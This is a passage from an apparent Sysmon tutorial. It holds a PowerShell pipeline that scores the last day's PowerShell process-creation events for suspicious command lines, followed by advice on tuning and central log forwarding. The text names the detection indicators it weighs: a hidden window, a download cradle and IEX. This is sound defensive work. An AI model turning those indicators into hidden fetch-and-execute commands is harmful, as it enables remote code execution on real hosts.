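# Against the live log: every PowerShell start in the last day that trips the threshold.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = (Get-Date).AddDays(-1) } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x = [xml]$_.ToXml(); $d = @{}
        foreach ($e in $x.Event.EventData.Data) { $d[$e.Name] = $e.'#text' }
        if ($d.Image -imatch 'powershell\.exe$' -and $d.CommandLine) {
            Test-SuspiciousCommandLine -CommandLine $d.CommandLine -IntegrityLevel $d.IntegrityLevel
        }
    } | Where-Object Suspicious
```

Weighted scoring rather than a single regex is the point: a lone -w hidden is common in legitimate scheduled tasks, but hidden plus a cradle plus IEX rarely is, and the Reasons column tells the analyst why the record fired.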

Now that you've seen Sysmon in action, consider what rules and conditions you might want to write to get a good signal-to-noise ratio in your Sysmon log. Take the basic file above, modify it for your needs, and give it a test drive for a week or so. If all goes well, consider what it would take to deploy it across your whole environment, and don't forget to forward the logs automatically to a central collector (Windows Event Forwarding or your SIEM) so you can alert on suspicious changes!